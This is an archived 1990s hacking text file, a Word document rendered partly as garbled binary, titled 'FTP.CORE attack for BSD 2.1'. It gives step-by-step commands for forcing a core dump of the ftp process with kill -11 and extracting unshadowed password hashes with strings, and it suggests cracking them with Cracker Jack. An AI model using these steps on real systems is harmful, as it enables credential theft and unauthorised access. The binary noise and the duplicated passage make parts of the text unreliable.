home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / ftpcore.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  9.0 KB  |  29 lines

  1. ╨╧αí▒ ß>■     ■                                                                                                                                                                                                                                                                                                                                                                                                                                                   ²   ■   ■   ■   ■       
  2.                                                                                                                                                                                                                                                                                                                                                                                                                                                             Root Entry            └F@pqwtσ║ÇWordDocument             CompObj            ^            ■                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ∙ç£░╤τ°jkmno¥¼╩∩ 167[\∙≤φτß█╒╧╔─┐║╡░½ªí£ùÆìêâ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡\`éº─Γπ                  /    0    4    5    \    ]    v    z    ▒    ╦    ╓    ╫    i
  3. j
  4. ·⌡≡δµß▄╫╥═╚├╛╣┤»¬Ñá¢ûæîç≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡j
  5. ε
  6. ²
  7. ·⌡≡δµ≡≡≡≡≡∙■
  8. ∙■
  9.         /K @±  Normala    "A@≥ í"Default Paragraph Font╨ @■ 
  10.         └FMicrosoft Word 6.0 Document
  11. MSWordDoc⌠9▓qo and should be able to pick it clean of all passwords and other information you might be interested in.
  12.  
  13. This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.
  14.  
  15. Bronc Buster
  16.  
  17.  
  18. ▄Ñe#└    ∙■
  19. ,l,l
  20. 
  21. ¬O(∞ÿTεO MS Sans Serif SymbolTimes New RomanTimes New RomanFTP.CORE attack for BSD 2.1
  22. -----------------------------------------------------------------------------------------------------------------
  23. by The Bronc Buster 
  24. bbuster@succeed.net
  25. http://www2.succeed.net/~bbuster
  26. Made for The Infected
  27. www.infected.com
  28. -----------------------------------------------------------------------------------------------------------------
  29.  
  30. This is a relativly simple attack, and can be done as ANY LEGIT user on a BSD 2.1 system. The focus of this attack is to get the ftp daemond to produce a core dump. When it dumps, all the information it has used up to the point it dumps will be stored in a file, in the the directory you are in, called "ftp.core". This file will contain shell and enviornment varibles, paths, and other misc stuff. What we will be looking for is the unshadowed passwd file. As this process has to access the passwd file to make sure you're legit, it stores all the information proir to your user in a buffer, and it will have to unshadow , or access the shadowed file, to do this. After you get the encrypted passwords, go find a copy of Cracker Jack and get to work. Ok, how to do it:
  31.  
  32.  
  33. #ftp foobar.com
  34. Welcom to foobar.com ftp site
  35. blah blah blah
  36. please enter login name> evil
  37. that user requires a password> evil2
  38.  User evil loged in welcome to foobar.com!
  39. Remote set to type BIN
  40. ftp>
  41.  
  42. (now hit ^Z to suspend the process)
  43.  
  44. #ps
  45.   PID  TT  STAT      TIME COMMAND
  46.  9526  p0  Ss     0:00.12 -csh (csh)
  47.  9539  p0  R+     0:00.02 ps
  48. 1000   p0  Ss     0:00.22 ftp
  49.  
  50. (get the PID number to the ftp process)
  51.  
  52. #kill -11 1000
  53.  
  54. (kill the process)
  55.  
  56. #fg
  57.  
  58. (bring the ftp back to the foreground)
  59.  
  60. Process Killed Core Dump
  61. #ls
  62. home          mail         public_html        ftp.core
  63. #strings ftp.core  > test
  64. #pico test
  65.  
  66. From this point you have the .core in pico and should be able to pick it clean of all passwords and other information you might be interested in.
  67.  
  68. This has only been tested, and worked on BSD 2.1 so far, if it works on other systems, feel free to modify this text to reflect it.
  69.  
  70. Bronc Buster
  71.  
  72.  
  73. ∙å碣»░╨╤µτ≈°ijklmno~£¥½¼╔╩ε∩ 01567Z[\_`ü骺├─ßΓπ
  74.                    ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐╜╗╣╖╡│▒»¡½⌐ºÑú탥¢ÖùòôæÅ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]8             .    /    0    3    4    5    [    \    ]    u    v    y    z    ░    ▒    ╩    ╦    ╒    ╓    ╫    h
  75. i
  76. j
  77. φ
  78. ε
  79. ²
  80. ²√∙≈⌡≤±∩φδΘτσπß▀▌█┘╫╒╙╤╧═╦╔╟┼├┴┐]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]